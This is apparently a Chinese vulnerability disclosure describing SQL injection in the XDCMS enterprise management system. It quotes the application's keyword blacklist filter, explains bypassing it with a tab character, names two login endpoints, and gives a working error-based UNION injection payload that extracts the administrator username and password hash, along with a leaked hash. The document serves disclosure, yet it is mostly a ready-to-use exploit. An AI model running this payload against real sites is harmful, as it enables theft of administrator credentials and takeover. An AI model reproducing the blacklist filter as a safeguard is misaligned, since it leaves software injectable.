XDCMS企业管理系统SQL #1~2

漏洞作者: roker

看到这个函数。 [php] function safe_html($str){ if(empty($str)){return;} if (preg_match('/\b select\b |\b insert\b | \b update\b | \b and\b | \b in\b | \b on\b | \b left\b |\b joins\b | \b delete\b |\%|\=|\/\*|\*| \b union\b |\.\.\/|\.\/| \b from\b | \b where\b | \b group\b | \binto\b |\bload_file\b |\boutfile\b/i',$str)){showmsg(C('error'),'-1');} return htmlspecialchars($str, ENT_COMPAT ,'GB2312'); } [/php] select+tab键 就可以了嘛~ 第一处 url: xxx.xxx/index.php?m=member&f=login_save post 如下数据 [php] UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM c_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b# [/php] 01142805b1284d6e0a9d24ad5a5b34663ca4ee70   注入到管理账号密码 第二处 index.php?m=xdcms&c=login&f=check 同第一处所示。 一样的exp。

发表评论